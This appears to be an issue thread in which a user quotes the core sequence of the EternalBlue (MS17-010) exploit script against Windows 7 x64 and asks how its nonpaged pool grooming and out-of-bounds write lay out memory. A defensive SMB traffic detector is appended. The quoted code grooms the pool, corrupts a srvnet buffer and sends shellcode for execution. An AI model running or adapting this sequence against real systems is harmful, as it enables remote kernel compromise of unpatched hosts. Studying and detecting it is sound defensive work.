Description
When I use eternalblue_exploit7.py to attack one virtual machine (Win7 with SP1 x64),
I have some questions!
The original code is below:
```python
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')

# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
progress = send_big_trans2(conn, tid, 0, feaList, b'\x00'*30, 2000, False)

# we have to know what size of NtFeaList will be created when last fragment is sent
# make sure server recv all payload before starting allocate big NonPaged
#sendEcho(conn, tid, 'a'*12)

# create buffer size NTFEA_SIZE-0x1000 at server
# this buffer MUST NOT be big enough for overflown buffer
allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)

# groom nonpaged pool
# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
srvnetConn = []
for i in range(numGroomConn):
    sk = createConnectionWithBigSMBFirst80(target)
    srvnetConn.append(sk)

# create buffer size NTFEA_SIZE at server
# this buffer will be replaced by overflown buffer
holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)

# disconnect allocConn to free buffer
# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
allocConn.get_socket().close()

# hope one of srvnetConn is next to holeConn
for i in range(5):
    sk = createConnectionWithBigSMBFirst80(target)
    srvnetConn.append(sk)

# send echo again, all new 5 srvnet buffers should be created
#sendEcho(conn, tid, 'a'*12)

# remove holeConn to create hole for fea buffer
holeConn.get_socket().close()

# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
send_trans2_second(conn, tid, feaList[progress:], progress)
recvPkt = conn.recvSMB()
retStatus = recvPkt.getNTStatus()
# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag
if retStatus == 0xc000000d:
    print('good response status: INVALID_PARAMETER')
else:
    print('bad response status: 0x{:08x}'.format(retStatus))

# one of srvnetConn struct header should be modified
# a corrupted buffer will write recv data in designed memory address
for sk in srvnetConn:
    sk.send(fake_recv_struct + shellcode)

# execute shellcode by closing srvnet connection
for sk in srvnetConn:
    sk.close()
```
question 1: when send_big_trans2 is used for the first time and has returned, is the _MDL structure's MappedSystemVa covered with 0xffffffffffd00010 - 0x80?

question 2: when allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010) is used for the first time and has returned, is the allocated memory's start address MappedSystemVa, or MappedSystemVa + 0x80?

question 3: when:

```python
for i in range(numGroomConn):
    sk = createConnectionWithBigSMBFirst80(target)
    srvnetConn.append(sk)
```

has finished, what does the memory look like? Can someone draw a memory structure picture for me?
Does the createConnectionWithBigSMBFirst80 function allocate memory inside the memory from allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010), or just next to it?

question 4: when holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10) is used, does the pool memory still start at address MappedSystemVa, or at MappedSystemVa + 0x80?

I am just confused by these allocation manipulations; I truly need a picture of the memory changes!

question 5:
In my perspective, when send_trans2_second(conn, tid, feaList[progress:], progress) has finished, the last fealist struct will be filled in at the address MappedSystemVa + 0x80. Is this true?

Can someone help me?
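From the defender's side, the flow quoted above has a recognisable network shape: one connection carries a large TRANS2_OPEN2 request split into 2000-byte fragments and is finally answered with STATUS_INVALID_PARAMETER (0xc000000d), while the groom loop opens many extra SMB connections from the same source. The toy detector below is an added example, not code from the MS17-010 repository or from the issue author; the event tuple layout, the sample events, and the two thresholds are assumptions made for this illustration.

```python
from collections import defaultdict

# Values from the SMB protocol and from the exploit flow quoted in the issue.
STATUS_INVALID_PARAMETER = 0xC000000D   # response the exploit expects after the last fragment
SMB_COM_NEGOTIATE = 0x72
SMB_COM_TRANSACTION2 = 0x32
SMB_COM_TRANSACTION2_SECONDARY = 0x33
FRAG_TOTAL_THRESHOLD = 0x10000          # assumption: >64 KiB of TRANS2 data on one connection is abnormal
GROOM_CONN_THRESHOLD = 8                # assumption: this many SMB connections from one source in a window

# Constructed sample events already parsed from SMB traffic:
# (src_ip, conn_id, kind, smb_command, data_len, nt_status); kind is "req" or "resp".
EVENTS = [
    ("10.0.0.5", 1, "req", SMB_COM_TRANSACTION2, 2000, None),
    *[("10.0.0.5", 1, "req", SMB_COM_TRANSACTION2_SECONDARY, 2000, None) for _ in range(40)],
    *[("10.0.0.5", c, "req", SMB_COM_NEGOTIATE, 80, None) for c in range(2, 16)],  # groom connections
    ("10.0.0.5", 1, "req", SMB_COM_TRANSACTION2_SECONDARY, 500, None),             # last fragment
    ("10.0.0.5", 1, "resp", SMB_COM_TRANSACTION2_SECONDARY, 0, STATUS_INVALID_PARAMETER),
    ("10.0.0.9", 20, "req", SMB_COM_TRANSACTION2, 300, None),                      # benign client
    ("10.0.0.9", 20, "resp", SMB_COM_TRANSACTION2, 100, 0),
]


def detect(events):
    """Return alert strings for the two traffic features of the quoted exploit flow."""
    frag_bytes = defaultdict(int)   # (src, conn) -> bytes sent in TRANS2 plus its secondaries
    conns = defaultdict(set)        # src -> distinct connection ids seen
    alerts = []
    for src, conn, kind, cmd, dlen, status in events:
        conns[src].add(conn)
        key = (src, conn)
        if kind == "req" and cmd in (SMB_COM_TRANSACTION2, SMB_COM_TRANSACTION2_SECONDARY):
            frag_bytes[key] += dlen
        elif kind == "resp" and cmd == SMB_COM_TRANSACTION2_SECONDARY and status == STATUS_INVALID_PARAMETER:
            # The exploit expects exactly this status after a very large fragmented TRANS2.
            if frag_bytes[key] >= FRAG_TOTAL_THRESHOLD:
                alerts.append(f"{src} conn {conn}: {frag_bytes[key]:#x} bytes of fragmented TRANS2 "
                              f"answered with STATUS_INVALID_PARAMETER")
    for src, ids in conns.items():
        if len(ids) >= GROOM_CONN_THRESHOLD:
            alerts.append(f"{src}: {len(ids)} SMB connections in window (possible pool groom)")
    return alerts


if __name__ == "__main__":
    for line in detect(EVENTS):
        print(line)
```

The two signals are independent, so a host that only fragments a large TRANS2 or only opens many sessions produces one alert rather than two.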